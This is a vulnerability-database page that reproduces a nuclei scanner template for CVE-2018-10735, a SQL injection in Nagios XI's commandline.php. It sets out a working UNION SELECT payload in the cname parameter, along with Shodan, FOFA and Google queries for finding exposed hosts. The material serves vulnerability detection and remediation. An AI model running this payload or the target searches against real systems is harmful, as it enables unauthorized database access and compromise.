Lucene search
K

NagiosXI <= 5.4.12 `commandline.php` SQL injection

🗓️ 21 Jun 2026 03:03:41Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 49 Views

NagiosXI v5.4.12 SQL injection via commandline.ph

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNVD
Nagios XI admin/commandline.php SQL Injection Vulnerability
17 May 201800:00
cnvd
CVE
CVE-2018-10735
16 May 201813:00
cve
Cvelist
CVE-2018-10735
16 May 201813:00
cvelist
NVD
CVE-2018-10735
16 May 201813:29
nvd
OpenVAS
Nagios XI < 5.4.13 Multiple Vulnerabilities - Active Check
27 Apr 201800:00
openvas
OSV
CVE-2018-10735
16 May 201813:29
osv
Prion
Sql injection
16 May 201813:29
prion
seebug.org
NagiosXI <= 5.4.12 commandline.php SQL injection(CVE-2018-10735)
4 May 201800:00
seebug
UbuntuCve
CVE-2018-10735
16 May 201813:29
ubuntucve
id: CVE-2018-10735

info:
  name: NagiosXI <= 5.4.12 `commandline.php` SQL injection
  author: DhiyaneshDk
  severity: high
  description: |
    A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/commandline.php cname parameter.
  impact: |
    Authenticated administrators can execute arbitrary SQL commands to access, modify, or delete database contents, potentially compromising the entire Nagios XI instance.
  remediation: |
    Upgrade to Nagios XI version 5.4.13 or later.
  reference:
    - https://vulners.com/seebug/SSV:97266
    - https://github.com/chaitin/xray/blob/master/pocs/nagio-cve-2018-10735.yml
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2018-10735
    cwe-id: CWE-89
    epss-score: 0.42556
    epss-percentile: 0.98533
    cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: nagios
    product: nagios_xi
    shodan-query: http.title:"nagios xi"
    fofa-query:
      - app="Nagios-XI"
      - title="nagios xi"
      - app="nagios-xi"
    google-query: intitle:"nagios xi"
  tags: cve,cve2018,nagios,sqli,vuln
variables:
  num: "{{rand_int(2000000000, 2100000000)}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/nagiosql/admin/commandline.php?cname=%27%20union%20select%20concat(md5({{num}}))%23"

    matchers:
      - type: word
        part: body
        words:
          - "{{md5(num)}}"
# digest: 4a0a00473045022100c4b06b67b2eea0231ed6d7ecefa367905da9c64bcc0e5f932fcda214681f143d022075579fa2590a3b57d8e7c58bf13b9cdaefec9b1010c837e8fffec6138e1ddd9f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 26.5
CVSS 37.2
EPSS0.42556
49